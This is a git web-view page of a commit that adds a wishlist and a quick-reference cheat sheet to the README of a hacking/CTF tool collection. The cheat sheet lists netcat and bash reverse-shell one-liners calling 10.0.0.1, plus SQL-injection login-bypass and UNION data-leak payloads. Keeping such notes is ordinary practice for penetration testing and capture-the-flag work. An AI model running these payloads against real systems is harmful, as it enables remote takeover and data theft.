summaryrefslogtreecommitdiffstats
path: root/README.txt
diff options
context:
space:
mode:
authorMalfurious <m@lfurio.us>2021-07-24 05:34:15 -0400
committerMalfurious <m@lfurio.us>2021-08-01 18:41:37 -0400
commitf74a259faf72d2b9601ca30671ab59bda2b45951 (patch)
tree698195798517bdd66c8c3d03956e34ad16a388d3 /README.txt
parentd51dcba166ce186f82901fbecb339aebfa9694aa (diff)
downloadlib-des-gnux-f74a259faf72d2b9601ca30671ab59bda2b45951.tar.gz
lib-des-gnux-f74a259faf72d2b9601ca30671ab59bda2b45951.zip
Add sections to the README file
The wishlist is a collection of things I want to add to the repository (either can't find them easily, or tools that need to be written). The quick reference is for random one-liner things that don't easily fit anywhere else in the folder structure. Signed-off-by: Malfurious <m@lfurio.us>
Diffstat (limited to 'README.txt')
-rw-r--r--README.txt19
1 files changed, 19 insertions, 0 deletions
diff --git a/README.txt b/README.txt
index 188eed0..970854f 100644
--- a/README.txt
+++ b/README.txt
@@ -3,3 +3,22 @@ Library of GNU Exploitation
This is a collection of unix-like utilities particularly suited
for creative problem solving (H A C K I N G).
+
+
+Wishlist
+--------
+* Additional wordlists from Kali
+* (Corrected) rockyou list from Kali
+ [Matching SHA256 16035fea7742cb0561c513de1d946eda5716d7de294e6c732449740096686173]
+* Docs on hydra?
+* Docs on sqlmap?
+* Build of stegsolve (Java program)
+
+
+Reference
+---------
+nc 10.0.0.1 1234 -e /bin/sh # Netcat reverse shell (Linux)
+nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows)
+bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
+' OR 1=1-- # SQL inject (pass)
+' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)